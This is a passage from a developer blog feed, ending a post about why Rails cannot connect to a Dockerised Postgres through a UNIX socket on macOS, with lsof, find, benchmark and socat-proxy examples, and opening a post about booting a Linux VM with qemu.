number&quot;&gt;0&lt;/span&gt;:41.56 postgres: autovacuum launcher&lt;br /&gt; &lt;span class=&quot;token number&quot;&gt;7853&lt;/span&gt; ??         &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt;:05.86 postgres: stats collector&lt;br /&gt; &lt;span class=&quot;token number&quot;&gt;7854&lt;/span&gt; ??         &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;:00.46 postgres: logical replication launcher&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;16014&lt;/span&gt; ttys002    &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;:00.00 &lt;span class=&quot;token function&quot;&gt;grep&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;--color&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;auto --exclude-dir&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;.bzr --exclude-dir&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;CVS --exclude-dir&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;.git --exclude-dir&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;.hg --exclude-dir&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;.svn --exclude-dir&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;.idea --exclude-dir&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;.tox postgres&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Postgres runs a few processes, but at a guess the &lt;code&gt;/bin/postgres&lt;/code&gt; one is probably the one we&#39;re looking for. So that&#39;s got a pid of &lt;code&gt;7847&lt;/code&gt;. We can feed that pid back to &lt;code&gt;lsof&lt;/code&gt;:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# -P stops converting port numbers to port names (e.g. port 80 to http), -p filters by a PID&lt;/span&gt;&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;lsof&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-Pp&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;7847&lt;/span&gt;&lt;br /&gt;COMMAND   PID   &lt;span class=&quot;token environment constant&quot;&gt;USER&lt;/span&gt;   FD    TYPE             DEVICE SIZE/OFF                NODE NAME&lt;br /&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;..&lt;/span&gt;.snip&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;br /&gt;postgres  &lt;span class=&quot;token number&quot;&gt;7847&lt;/span&gt;  martin 10u   unix             0xb49e813effdd307b  0t0        /tmp/.s.PGSQL.5432&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If we peek into the pid of Postgres.app, we can indeed see a path for our &lt;code&gt;/tmp/.s.PGSQL.5432&lt;/code&gt; file. We can see in our &lt;code&gt;TYPE&lt;/code&gt; section that it is, as we explored, a UNIX domain socket.&lt;/p&gt;
&lt;p&gt;Our file descriptor integer for &lt;code&gt;/tmp/.s.PGSQL.5432&lt;/code&gt; associated with &lt;em&gt;this&lt;/em&gt; process is marked as &lt;code&gt;10&lt;/code&gt;  (&lt;code&gt;lsof&lt;/code&gt; suffixes it with a &lt;code&gt;u&lt;/code&gt;, which means it&#39;s open for reading and writing).&lt;/p&gt;
&lt;p&gt;&lt;code&gt;tmp/.s.PGSQL.5432&lt;/code&gt; is a file, so it also conforms with standard UNIX file permissions:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# -l displays &#39;long mode&#39;: file mode, number of links, owner name, group name, number of bytes in the file, abbreviated month, day-of-month file was last modified, hour file last modified, minute file last modified, and the pathname.&lt;/span&gt;&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;ls&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-l&lt;/span&gt; /tmp/.s.PGSQL.5432&lt;br /&gt;srwxrwxrwx  &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; martin  wheel  &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt; Aug &lt;span class=&quot;token number&quot;&gt;21&lt;/span&gt;:40 /tmp/.s.PGSQL.5432&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;srwxrwxrwx&lt;/code&gt; section is the file mode - the first character &lt;code&gt;s&lt;/code&gt; shows that this is a socket link, and the &lt;code&gt;rwxrwxrwx&lt;/code&gt; shows that the socket can be read, written and executed for the owner, group and other users on the system; it&#39;s wide open. If it showed, say, &lt;code&gt;srwx------&lt;/code&gt; (&lt;code&gt;700&lt;/code&gt; in octal notation) then only the owner (in this example, &lt;code&gt;martin&lt;/code&gt;) could interact with it.&lt;/p&gt;
&lt;p&gt;One thing that always blows my mind while simultaneously making perfect sense is that the file &lt;code&gt;/tmp/.s.PGSQL.5432&lt;/code&gt; here isn&#39;t actually hitting the disk to read and write bytes. Writing to the disk is much slower than keeping information in kernel memory. And, because you&#39;re not going through extra layers of networking, communication over UNIX sockets should technically be &lt;em&gt;faster&lt;/em&gt; than using a &lt;code&gt;localhost&lt;/code&gt; TCP/IP connection.&lt;/p&gt;
&lt;p&gt;In the context of day-to-day local development, you will almost certainly not need that extra speed, most of the time...&lt;/p&gt;
&lt;p&gt;... but just &lt;em&gt;how&lt;/em&gt; much faster, though?&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;time&lt;/span&gt; client &lt;span class=&quot;token parameter variable&quot;&gt;-network&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;tcp&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-address&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;localhost:8080&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-input&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;./war-and-peace.txt&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-loop&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;5&lt;/span&gt;.73s user &lt;span class=&quot;token number&quot;&gt;9&lt;/span&gt;.54s system &lt;span class=&quot;token number&quot;&gt;66&lt;/span&gt;% cpu &lt;span class=&quot;token number&quot;&gt;22.862&lt;/span&gt; total&lt;br /&gt;&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;time&lt;/span&gt; client &lt;span class=&quot;token parameter variable&quot;&gt;-network&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;unix&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-address&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;./sock.sock&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-input&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;./war-and-peace.txt&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-loop&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;.55s user &lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt;.82s system &lt;span class=&quot;token number&quot;&gt;73&lt;/span&gt;% cpu &lt;span class=&quot;token number&quot;&gt;5.955&lt;/span&gt; total&lt;br /&gt;&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;time&lt;/span&gt; client &lt;span class=&quot;token parameter variable&quot;&gt;-network&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;tcp&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-address&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;localhost:8080&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-input&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;./war-and-peace.txt&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-loop&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-users&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;49&lt;/span&gt;.94s user &lt;span class=&quot;token number&quot;&gt;120&lt;/span&gt;.26s system &lt;span class=&quot;token number&quot;&gt;194&lt;/span&gt;% cpu &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;:27.39 total&lt;br /&gt;&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;time&lt;/span&gt; client &lt;span class=&quot;token parameter variable&quot;&gt;-network&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;unix&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-address&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;./sock.sock&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-input&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;./war-and-peace.txt&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-loop&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-users&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;55&lt;/span&gt;.63s user &lt;span class=&quot;token number&quot;&gt;145&lt;/span&gt;.38s system &lt;span class=&quot;token number&quot;&gt;403&lt;/span&gt;% cpu &lt;span class=&quot;token number&quot;&gt;49.802&lt;/span&gt; total&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Note that I&#39;m no expert in benchmarking, so this should not be considered especially authoritative. Still, this little &lt;code&gt;client&lt;/code&gt; executable dials out to an echo server which beams back whatever it receives. The client is set to send and receive each line of the Project Gutenberg edition of Leo Tolstoy&#39;s &lt;em&gt;War and Peace&lt;/em&gt;, because culture is important.&lt;/p&gt;
&lt;p&gt;On my machine, looping through the book ten times with a single user was almost 74% faster on the UNIX domain socket, and 43% faster when having ten concurrent users loop through the book ten times apiece.&lt;/p&gt;
&lt;h2 id=&quot;dock-around-the-clock&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/why-cant-rails-use-unix-sockets-with-containerized-postgres/#dock-around-the-clock&quot;&gt;Dock Around The Clock&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;So now we&#39;ve been on a journey. We know that our Rails application, by default, is configured to use UNIX sockets to connect to Postgres for local development. We&#39;re also well over 2000 words into a blog post on something that could (and, again: should) have been fixed just fine to using TCP by changing just one line of code.&lt;/p&gt;
&lt;p&gt;Now, we&#39;ll remove Postgres.app from this system and bring Docker back into the mix. We&#39;ll setup an ephemeral Postgres container:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;docker&lt;/span&gt; run &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token parameter variable&quot;&gt;--rm&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token parameter variable&quot;&gt;--name&lt;/span&gt; my-cool-postgres-container &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token parameter variable&quot;&gt;-e&lt;/span&gt; &lt;span class=&quot;token assign-left variable&quot;&gt;POSTGRES_PASSWORD&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;cool &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;5432&lt;/span&gt;:5432 &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token parameter variable&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  postgres:14&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And, from inside that container, &lt;code&gt;ls&lt;/code&gt; out the &lt;code&gt;/tmp&lt;/code&gt; directory to look for the &lt;code&gt;.s.PGSQL.5432&lt;/code&gt; file:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;docker&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;exec&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-it&lt;/span&gt; my-cool-postgres-container /bin/bash&lt;br /&gt;root@8759862222c5:/tmp&lt;span class=&quot;token comment&quot;&gt;# ls -al /tmp&lt;/span&gt;&lt;br /&gt;total &lt;span class=&quot;token number&quot;&gt;8&lt;/span&gt;&lt;br /&gt;drwxrwxrwt &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; root root &lt;span class=&quot;token number&quot;&gt;4096&lt;/span&gt; Jun &lt;span class=&quot;token number&quot;&gt;23&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;14&lt;/span&gt;:27 &lt;span class=&quot;token builtin class-name&quot;&gt;.&lt;/span&gt;&lt;br /&gt;drwxr-xr-x &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; root root &lt;span class=&quot;token number&quot;&gt;4096&lt;/span&gt; Aug &lt;span class=&quot;token number&quot;&gt;16&lt;/span&gt; 06:17 &lt;span class=&quot;token punctuation&quot;&gt;..&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Oh. It&#39;s not there. Let&#39;s &lt;code&gt;find&lt;/code&gt; it:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# 2&gt;/dev/null redirects all errors to /dev/null, which is like a black hole&lt;/span&gt;&lt;br /&gt;postgres@8759862222c5:/$ &lt;span class=&quot;token function&quot;&gt;find&lt;/span&gt; / &lt;span class=&quot;token parameter variable&quot;&gt;-name&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;.s.PGSQL.5432&quot;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&lt;span class=&quot;token file-descriptor important&quot;&gt;2&lt;/span&gt;&gt;&lt;/span&gt;/dev/null&lt;br /&gt;./run/postgresql/.s.PGSQL.5432&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It is, perhaps counter-intuitively, in a different place inside the container. How confusing!&lt;/p&gt;
&lt;p&gt;Running to the &lt;a href=&quot;https://www.postgresql.org/docs/14/runtime-config-connection.html&quot;&gt;Postgres documentation&lt;/a&gt; shows that the configuration value we might be interested in is called &lt;code&gt;unix_socket_directories&lt;/code&gt;, and the &lt;a href=&quot;https://www.postgresql.org/docs/current/sql-show.html&quot;&gt;&lt;code&gt;SHOW&lt;/code&gt;&lt;/a&gt; SQL command can be used to see the current setting.&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;docker&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;exec&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-it&lt;/span&gt; my-cool-postgres-container psql &lt;span class=&quot;token parameter variable&quot;&gt;-U&lt;/span&gt; postgres &lt;span class=&quot;token parameter variable&quot;&gt;-c&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;SHOW unix_socket_directories&quot;&lt;/span&gt;&lt;br /&gt; unix_socket_directories&lt;br /&gt;-------------------------&lt;br /&gt; /var/run/postgresql&lt;br /&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; row&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Another path! Now we&#39;re even more confused.&lt;/p&gt;
&lt;p&gt;So, we&#39;ve got the Postgres running inside the container saying it will save its UNIX sockets into &lt;code&gt;/var/run/postgresql&lt;/code&gt;, but our &lt;code&gt;find&lt;/code&gt; command spots it in &lt;code&gt;/run/postgresql&lt;/code&gt;. And outside of the container, the Postgres running on the macOS pops the socket in &lt;code&gt;/tmp&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The documentation hints at to what might be going on: &lt;code&gt;The default value is normally /tmp, but that can be changed at build time.&lt;/code&gt; So the Postgres.app installation on macOS is presumably popping it in the default spot.&lt;/p&gt;
&lt;p&gt;Now, let&#39;s head back inside the container. Instead of macOS, we&#39;re now running Linux. The typical convention on Linux points to &lt;code&gt;/run&lt;/code&gt; as the &lt;a href=&quot;https://refspecs.linuxfoundation.org/FHS_3.0/fhs/ch03s15.html&quot;&gt;home for UNIX sockets&lt;/a&gt;. But Postgres also configures itself to use &lt;code&gt;/var/run&lt;/code&gt;, which (these days) has the same purpose as &lt;code&gt;/run&lt;/code&gt; but is maintained for legacy reasons. The specification mentions that &lt;code&gt;/var/run&lt;/code&gt; can be symlinked to &lt;code&gt;run&lt;/code&gt;, so let&#39;s take a look:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;postgres@8759862222c5:/$ &lt;span class=&quot;token function&quot;&gt;ls&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-al&lt;/span&gt; /var/run&lt;br /&gt;lrwxrwxrwx &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; root root &lt;span class=&quot;token number&quot;&gt;4&lt;/span&gt; Jun &lt;span class=&quot;token number&quot;&gt;22&lt;/span&gt; 00:00 /var/run -&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt; /run&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, that (mostly) explains that!&lt;/p&gt;
&lt;p&gt;Now, we know where the socket file exists inside the container - so we can use a Docker bind mount to expose it to our macOS filesystem.&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;docker&lt;/span&gt; run &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token parameter variable&quot;&gt;--rm&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token parameter variable&quot;&gt;--name&lt;/span&gt; my-cool-postgres-container &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token parameter variable&quot;&gt;-v&lt;/span&gt; /tmp/postgresql:/run/postgresql &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token parameter variable&quot;&gt;-e&lt;/span&gt; &lt;span class=&quot;token assign-left variable&quot;&gt;POSTGRES_PASSWORD&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;cool &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token parameter variable&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  postgres:14&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We can see the file from the macOS host system, which is pretty cool.&lt;/p&gt;
&lt;p&gt;But we still won&#39;t be able to connect to it. Womp womp.&lt;/p&gt;
&lt;h2 id=&quot;hitting-dock-bottom&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/why-cant-rails-use-unix-sockets-with-containerized-postgres/#hitting-dock-bottom&quot;&gt;Hitting Dock Bottom&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;We&#39;ve established a couple of really important things:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;UNIX sockets enable two separate processes to communicate via the operating system kernel&lt;/li&gt;
&lt;li&gt;Socket files provide a namespace for both processes (the server and the client) to find each other&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You may have intuitively felt this coming, but here it is: even with the file exposed from our container to our macOS host machine, a process on the host (&lt;code&gt;rake&lt;/code&gt;) and a process inside a container (&lt;code&gt;postgres&lt;/code&gt;) cannot speak to each other over a UNIX socket. We&#39;ve already mentioned that the actual &lt;em&gt;file&lt;/em&gt; isn&#39;t used to send the data and is instead managed by the kernel. And on macOS there&#39;s actually two different operating system kernels in play.&lt;/p&gt;
&lt;p&gt;Docker on macOS quietly sets up its own virtual machine. It&#39;s deftly integrated into Docker Desktop, and it&#39;s almost completely invisible to the end user - you have to really go poking for it to see a trace in your system, but each of your containers is communicating with a separate (Linux) operating system kernel to the host system.&lt;/p&gt;
&lt;p&gt;What happens, then, is that the Postgres installation creates a UNIX socket which it registers with the Linux kernel inside this Linux VM.&lt;/p&gt;
&lt;p&gt;You can expose the resulting &lt;code&gt;.s.PGSQL.5432&lt;/code&gt; file to the macOS kernel, but it will shrug it off as it has no recollection of that file. It doesn&#39;t mean anything to macOS - it hasn&#39;t received any of those vital system calls: as far as the macOS kernel is concerned it&#39;s just an empty file.&lt;/p&gt;
&lt;h2 id=&quot;warning%3A-everything-after-this-point-is-awful&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/why-cant-rails-use-unix-sockets-with-containerized-postgres/#warning%3A-everything-after-this-point-is-awful&quot;&gt;Warning: Everything After This Point Is Awful&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Now, there &lt;em&gt;is&lt;/em&gt; an incredibly convoluted way we can get this communication up and running that will almost entirely defeat any real point of wanting to use a UNIX socket between a macOS host and a container. So, obviously, let&#39;s do it. But, you know, &lt;em&gt;never actually do this&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;We can use &lt;code&gt;socat&lt;/code&gt;, which will let us proxy between TCP and UNIX domain sockets.&lt;/p&gt;
&lt;p&gt;We&#39;re going create another &#39;sidecar&#39; container that will have access to the socket file that Postgres uses, and then create a TCP proxy that our macOS kernel can communicate with. Yup. That&#39;s frightfully awful, but also awesome.&lt;/p&gt;
&lt;p&gt;Let&#39;s set it up. We&#39;ll create a &lt;code&gt;Dockerfile&lt;/code&gt;, which installs &lt;code&gt;socat&lt;/code&gt; and copies a bash script into an Alpine container. And then we&#39;ll make a &lt;code&gt;compose.yml&lt;/code&gt; file to let &lt;code&gt;docker compose&lt;/code&gt; do the heavy lifting. I won&#39;t go through the code line-by-line here, but you can dig into the associated GitHub repo if you&#39;d like to see it in action or give it a whirl on your machine.&lt;/p&gt;
&lt;p&gt;Our &lt;code&gt;compose.yml&lt;/code&gt; will have two services, &lt;code&gt;db&lt;/code&gt; and &lt;code&gt;proxy&lt;/code&gt;. They&#39;ll share a volume so that the &lt;code&gt;proxy&lt;/code&gt; service can interact with the UNIX domain socket that &lt;code&gt;db&lt;/code&gt; sets up, and as they&#39;re both &lt;em&gt;inside&lt;/em&gt; Docker they&#39;ll be within the virtual machine and therefore can chat to the same Linux kernel. The &lt;code&gt;proxy&lt;/code&gt; service will then forward the UNIX socket to a TCP port (&lt;code&gt;5433&lt;/code&gt;) which we&#39;ll expose to the macOS host.&lt;/p&gt;
&lt;p&gt;Now, on the macOS host machine we need to create another &lt;code&gt;socat&lt;/code&gt; connection which listens for connections to the UNIX socket at &lt;code&gt;/tmp/.s.PGSQL.5432&lt;/code&gt; and then proxies them over to the port we&#39;re sharing with our &lt;code&gt;proxy&lt;/code&gt; container:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ socat &lt;span class=&quot;token parameter variable&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-d&lt;/span&gt; UNIX-LISTEN:/tmp/.s.PGSQL.5432,unlink-early,fork TCP:localhost:5433&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But doesn&#39;t all this extra weight, going through TCP and back out again, ultimately give us extra overhead, make it less performant, and make all of this a largely pointless exercise? Oh, definitely!&lt;/p&gt;
&lt;p&gt;... but just &lt;em&gt;how&lt;/em&gt; much more pointless, though?&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;time&lt;/span&gt; client &lt;span class=&quot;token parameter variable&quot;&gt;-network&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;unix&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-address&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;/tmp/server.sock&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-input&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;./war-and-peace.txt&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-loop&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;.20s user &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;.75s system &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt;% cpu &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;:25.29 total&lt;/code&gt;&lt;/pre&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;time&lt;/span&gt; build/client &lt;span class=&quot;token parameter variable&quot;&gt;-network&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;unix&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-address&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;/tmp/server.sock&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-input&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;./war-and-peace.txt&quot;&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;11&lt;/span&gt;.05s user &lt;span class=&quot;token number&quot;&gt;15&lt;/span&gt;.93s system &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt;% cpu &lt;span class=&quot;token number&quot;&gt;13&lt;/span&gt;:23.49 total&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Wow. We&#39;ve gone from 0:49 to 13:23.49, a ~1500% increase.&lt;/p&gt;
&lt;p&gt;Note that having to communicate through the Docker networking (and, by extension, the HyperKit VM) adds some overhead even &lt;em&gt;without&lt;/em&gt; the socket proxying.&lt;/p&gt;
&lt;p&gt;This is by no means a performant solution, then, but it was extremely fun to poke around the system, realise how deeply intertwined the operating system is networking and to ultimately try and tease Docker into a non-standard configuration.&lt;/p&gt;
&lt;p&gt;And, even better, if we go back to that original problem...&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ bundle &lt;span class=&quot;token builtin class-name&quot;&gt;exec&lt;/span&gt; rake db:setup&lt;br /&gt;Created database &lt;span class=&quot;token string&quot;&gt;&#39;backend_development&#39;&lt;/span&gt;&lt;br /&gt;Created database &lt;span class=&quot;token string&quot;&gt;&#39;backend_test&#39;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;$ &lt;span class=&quot;token builtin class-name&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;token variable&quot;&gt;$?&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Amazing! But I think just this one time I&#39;ll &lt;a href=&quot;https://rubyonrails.org/doctrine&quot;&gt;abandon the Rails doctrine&lt;/a&gt; and go with the one-line configuration over convention. Also: Rails is pretty cool! When I finally stopped going down this silly rabbit hole I had a really fun time using it for the aforementioned work project.&lt;/p&gt;
</content>
  </entry>
  <entry>
    <title>Boot an ephemeral Linux VM in macOS with qemu</title>
    <link href="https://martingaston.dev/articles/boot-an-ephemeral-linux-vm-in-macos-with-qemu/"/>
    <updated>2023-07-05T00:00:00Z</updated>
    <id>https://martingaston.dev/articles/boot-an-ephemeral-linux-vm-in-macos-with-qemu/</id>
    <content xml:lang="en" type="html">&lt;p&gt;I work on macOS, but sometimes it&#39;s very helpful to tinker with a full-fat Linux environment. Booting up a whole virtual machine is going to be more heavyweight than running something like &lt;code&gt;docker run --rm -it fedora&lt;/code&gt; , but as I host most of my personal projects on a &lt;a href=&quot;https://boringtechnology.club/&quot;&gt;boring&lt;/a&gt; server it can be useful to have a quick(ish) feedback loop for testing things like &lt;code&gt;systemd&lt;/code&gt; and &lt;code&gt;cron&lt;/code&gt;.&lt;/p&gt;
